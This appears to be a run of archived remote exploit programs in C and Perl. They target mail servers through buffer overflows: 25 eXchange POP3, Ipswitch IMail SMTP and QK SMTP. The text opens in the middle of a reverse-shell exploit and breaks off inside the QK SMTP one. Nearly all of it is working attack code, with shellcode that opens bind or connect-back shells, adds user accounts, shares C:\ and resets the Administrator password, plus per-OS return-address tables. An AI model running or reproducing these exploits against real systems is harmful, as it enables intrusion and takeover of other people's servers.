shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ) );
close ( s2 );
}
void
wait ( int sec )
{
sleep ( sec );
}
int
main ( int argc, char* argv[] )
{
int s, option;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
printf ( "--[ select shellcode\n" );
printf ( " |\n" );
printf ( " |- [0] bind\n" );
printf ( " `- [1] cb\n" );
printf ( ">> " );
scanf ( "%d", &option );
switch ( option )
{
case 0:
printf ( "--[ sorry, does not work yet :/\n" );
/*
printf ( "--[ using bind shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 3879 );
*/
break;
case 1:
printf ( "--[ using cb shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( 45295 );
break;
default:
printf ( "--[ invalid shellcode!\n" ); exit ( 1 );
}
close ( s );
return 0;
}
// [2005-05-05]
25 eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
# for educational purposes only .
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$buffer2 = "\x90"x1999999;
$mailf= "mail";
$rcptt ="rcpt to:<";
$buffer = "\x41"x4100;
$ret = "\x80\x1d\xdc\x02";
$shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33".
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C".
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE".
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB".
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77".
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77".
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77".
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77".
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77".
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77".
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77".
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77".
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77".
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB".
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C".
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0".
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77".
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0".
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB".
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5".
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98".
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE".
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77".
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8".
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF".
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90".
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74".
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4".
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94".
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5".
"\xD3\x4A\x8C\x88";
$enter = "\x0d\x0a";
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect" }
print "\nExchangepop3 v5.0 remote exploit by securma massine\n";
print "\n+++++++++++www.morx.org++++++++++++++++\n";
$connect->recv($text,128);
print "$text\n";
$connect->send($mailf . $enter);
$connect->recv($text,128);
print "$text\n";
$connect->send($rcptt . $buffer . $ret . $buffer2 . $shellcode . $enter);
print "\nsending exploit......\n\n";
print "\ntelnet to server port 9191 .........\n\n";
# [2006-02-03]
25 Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit
// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[1028];
// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x 74\x24\xf4\x58"
"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\x eb\x6e\x21\x46"
"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x 60\xee\xa7\x69"
"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x 7c\xe6\x49\x89"
"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\x b1\x49\xe7\x62"
"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x 78\x0e\xf4\x34"
"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x 99\xa7\x07\x3c"
"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\x ff\x4c\x38\xa5"
"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x 75\x89\xc0\xac"
"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\x b3\x8d\x97\xdc"
"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\x a8\x05\x4b\x26"
"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
unsigned char Win32Bind[] =
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x93"
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x 7b\x82\x42\xc9"
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\x eb\x7a\x52\xbd"
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x 7d\x4a\x7d\xaf"
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\x a8\x2f\x99\x1e"
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\x cc\x67\xbc\xdd"
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x 18\x38\x8d\xbd"
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\x dd\x75\x51\x66"
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\x cc\x2f\x42\xe6"
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x 12\x96\xb5\x34"
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x 45\x28\xee\x65"
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\x f5\x28\x34\xd7"
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\x c6\x84\x6d\x5e"
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x 76\x32\x3b\x7f"
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\x ea\xbd\xc4\x61"
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x 1a\x9e\xd7\x66"
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x 39\x85\xff\x1b"
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x 6d\xc8\xab\xc9"
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\x c2\x2a\xe8\x67"
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x 6c\x4c\x42\xe6"
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x 63\xf1\xb9\x69"
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
/* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char AddUser[] =
"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xb2"
"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\x b2\xe6\x24\x2f"
"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x 92\xe7\x44\x23"
"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\x b5\x27\x65\x67"
"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x 96\xe7\x44\x0c"
"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x 59\x6f\xf3\x4e"
"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x 39\xa6\xa3\xe1"
"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\x b2\xe6\x24\x02"
"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\x da\x16\x25\x6e"
"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x 9c\x83\xd7\x0f"
"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x 92\xa3\xdd\x18"
"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\x f6\xc6\x89\x4c"
"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\x dd\x93\xdf\x4a"
"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\x c0\x95\x8f\x2f"
"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a";
/* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
unsigned char ChangeAdmin[] =
"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x74"
"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x 74\xb8\xc4\xff"
"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x 54\xb9\xa4\xf3"
"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x 73\x79\x85\xb7"
"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x 50\xb9\xa4\xdc"
"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x 9f\x31\x13\x9e"
"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\x ff\xf8\x43\x31"
"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x 74\xb8\xc4\xd2"
"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x 1c\x48\xc5\xbe"
"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x 54\xcd\x3c\xdf"
"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x 74\xb8\x4f\xba";
WSADATA wsaData;
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int plen, i, JMP;
char *hostname;
unsigned short port;
printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n");
printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\n");
if (argc <= 1)
{
printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]);
printf("Default port is 25 \r\n");
printf("==============================\n");
printf("Payload Options: 1 = Default\n");
printf("==============================\n");
printf("1 = Share C:\\ as 'Export' Share\n");
printf("2 = Add User 'Error' with Password 'Error'\n");
printf("3 = Win32 Bind CMD to Port 4444\n");
printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
printf("==============================\n");
printf("JMP Options: 1 = Default\n");
printf("==============================\n");
printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 \n");
printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n");
printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n");
printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n");
printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n");
printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n");
printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n");
printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n");
exit(0);
}
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("25");
if (argv[4]) JMP = atoi(argv[4]);
else JMP = atoi("1");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL)
{
printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
// JMP to EAX = Results in a Corrupted Stack
// so instead we POP EBP, RET to restore pointer and then return
// this causes code procedure to continue
/*
['IMail 8.x Universal', 0x10036f71 ],
['Windows 2003 SP1 English', 0x7c87d8af ],
['Windows 2003 SP0 English', 0x77d5c14c ],
['Windows XP SP2 English', 0x7c967e23 ],
['Windows XP SP1 English', 0x71ab389c ],
['Windows XP SP0 English', 0x71ab389c ],
['Windows 2000 Universal English', 0x75021397 ],
['Windows 2000 Universal French', 0x74fa1397],
['Windows XP SP1 - SP2 German', 0x77d18c14],
*/
char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and :
char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23
char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71
char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c
char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397
char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397
char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14
char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work.
// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
// After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works
// On all versions from 8.x to 2006 (9.x?)
char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload.
memset(overflow, 0, 1028);
strcat(overflow, Exp);
if (JMP == 1)
{
printf("Using IMail 8.15 SMTDP.DLL JMP\n");
strcat(overflow, IMail815);
} else if (JMP == 2)
{
printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
strcat(overflow, Win2k3SP1E);
} else if (JMP == 3)
{
printf("Using Win2003 SP0 USER32.DLL JMP\n");
strcat(overflow, Win2k3SP0E);
} else if (JMP == 4)
{
printf("Using WinXP SP2 NTDLL.DLL JMP\n");
strcat(overflow, WinXPSP2E);
} else if (JMP == 5)
{
printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
strcat(overflow, WinXPSP1);
} else if (JMP == 6)
{
printf("Using Win2000 Universal English USER32.DLL JMP\n");
strcat(overflow, Win2KE);
} else if (JMP == 7)
{
printf("Using Win2000 Universal French USER32.DLL JMP\n");
strcat(overflow, Win2KF);
} else if (JMP == 8)
{
printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
strcat(overflow, WinXPG);
} else {
printf("Using IMail 8.15 SMTDP.DLL JMP\n");
strcat(overflow, IMail815);
}
// Setup Payload Options
if (atoi(argv[3]) == 1)
{
printf("Using Root Share Payload\n");
plen = 544 - ((strlen(RootShare) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, RootShare);
} else if (atoi(argv[3]) == 2)
{
printf("Using Add User Payload\n");
plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, AddUser);
} else if (atoi(argv[3]) == 3)
{
printf("Using Win32 CMD Bind Payload\n");
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
} else if (atoi(argv[3]) == 4)
{
printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n");
plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, ChangeAdmin);
} else
{
printf("Using Win32 CMD Bind Payload\n");
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
}
// Dont forget to add the trailing characters to set up stack overflow
strcat(overflow, tail);
// Connect to SMTP Server and Setup Up Email
char EHLO[] = "EHLO \r\n";
char MF[] = "MAIL FROM <TEST@TEST> \r\n";
send(sockfd, EHLO, strlen(EHLO), 0);
Sleep(1000);
send(sockfd, MF, strlen(MF), 0);
Sleep(1000);
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
printf("ERROR: Send Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Exploit Sent.....\r\n");
if (atoi(argv[3]) == 3)
{
printf("Check Shell on Port 4444\n");
closesocket(sockfd);
WSACleanup();
exit(0);
}
printf("Checking If Exploit Executed....\r\n");
Sleep(1000);
closesocket(sockfd);
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("Exploit Successfully Delivered!\n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
printf("...");
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("Exploit Successfully Delivered!\n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL)
{
printf("Exploit Successfully Delivered!\n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
printf("Exploit Failed: Try A different JMP Method or Payload\n");
closesocket(sockfd);
WSACleanup();
exit (1);
}
// [2006-10-19]
25 QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 25\10\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP
* MxM .mmm
* W"W """
[i] Title: QK SMTP <= 3.01 RCPT-TO Buffer Overflow Exploit
[i] Discovered by: Greg Linares
[i] Exploit by: Expanders - expanders [aaat] gmail [dooot] com
[i] References: http://www.securityfocus.com/bid/20681 --- http://www.qksoft.com/
[i] Greatings: x0n3-h4ck - netbunny
[ Research diary ]
Ok.. I'm ready to write some lines about this exploit..
I've encountered some problems during development:
ESI and ESP points to our buffer, in a memory location that will be contaminated with some bytes after
storing our data. result: I coulnt put shellcode directly here because it will be changed.
So i had to write a short jmpback unicode-proof shellcode using venetian tecnique.
Because of some unknown reasons i was not able to get a socket-based shellcode working..
in this exploit I use an ADD USER shellcode.
[ Timeline ]
Vendor has been informed and version 3.10b has been released.
[ Notes ]
RETcode type: POINTER TO [ESP]
To improve realiability you can search your own RETcodes..
[ Documentation ]
Venetian exploit: http://www.net-security.org/dl/articles/unicodebo.pdf
Skylined Alpha2 : www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php
[ Special Thanks ]
Skylined
H D Moore
Greg Linares
[ Links ]
www.x0n3-h4ck.org
www.netbunny.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
// You may want to change this, is the user and the password of shellcode added user
#define NETADD_USER "x0n3"
#define NETADD_PASS "h4ck"
// Exploit internal constant, change only if you know what you are doing
#define HELO "EHLO\r\n"
#define MAIL_FROM "MAIL FROM: <[email protected]>\r\n"
#define BUGSTR "RCPT TO: %s@****.com>\r\n"
#define BUFFSIZE 10000
#define SC_MAX_SIZE 800
#define MAX_ENCODED_LEN 100
// Offsets
#define RET_OFFSET 296
#define JMPBACK_OFFSET 4089
#define SHELLCODE_OFFSET 2524
int encode_alphanum(unsigned char *src,unsigned char *dest,int len);
int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );
// win32 ADD user un-encoded shellcode taken from metasploit [ tnx hdm & vlas902 ]
// encoded using Skylined alpha2 tool
char alphanum_shellcode[] =
// Skylined's alpha2 unicode decoder
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI AQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
"BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
// Encoded opcodes
"ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDK oDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
"kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBk MLRkzajKQyQLmTM45sNQUpotRkmplp"
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMl aOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
"C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRU psqUPrmP%skp%s"
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQ otPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
"MPNOOQa4oTkPA";
// Fully customizable UNICODE-PROOF jmpback shellcode
// Written with venetian tecnique to jmpback as more as possible using as less as possible bytes
// Note that \x73 is "add byte ptr [ebx],dh", ebx point to a useless but writable location so
// we can use this instruction as a unicode NOP to realign with our next instruction
unsigned char jmpback[] =
"\x50\x73" // push eax |
"\x54\x73" // push esp | Workaroung for "xchg eax,esp" cos 0x96 is filtered
"\x58\x73" // pop eax |____
"\xB0" // mov al,0x0 | Set last eax byte to zero..
"\x48\x73" // dec ax | ..and next we decrement eax
"\xB0\x48\x73"
"\xB0\x48\x73" // | Again...
"\xB0\x48\x73" // | ...and angain
"\xB0\x48\x73"
"\xB0\x48\x73" // | every time it substract 0xFF to eax
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\xB0\x48\x73"
"\x48\x73"// | eax is aligned to the shellcode
"\x50\x73" // push eax
"\xC3\x73"; // retn
//"\x50\x73\xBA\xAA\xAA\x73\x52\x73\xC3\x73"; // push eax = 0xAA00AA00 and retn !!DEBUG!!
struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "Windows NT Universal", 0x77cec080 }, // shell32.dll push esp, ret [Tnx to metasploit]
{ "Windows 2k SP 4" , 0x75031dce }, // ws2_32.dll push esp, ret [Tnx to metasploit]
{ "Windows XP SP 0/1" , 0x71ab7bfb }, // ws2_32.dll jmp esp [Tnx to metasploit]
{ "Windows XP SP 2 ENG" , 0x71ab9372 }, // ws2_32.dll push esp, ret [Tnx to metasploit]
{ "Windows XP SP 2 ITA" , 0x77D92CFC }, // user32.dll jmp esp
{ NULL }
};
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tQK SMTP Remote RCPT-TO Buffer overflow\n");
printf("[i] Discovered by:\tGreg Linares\n");
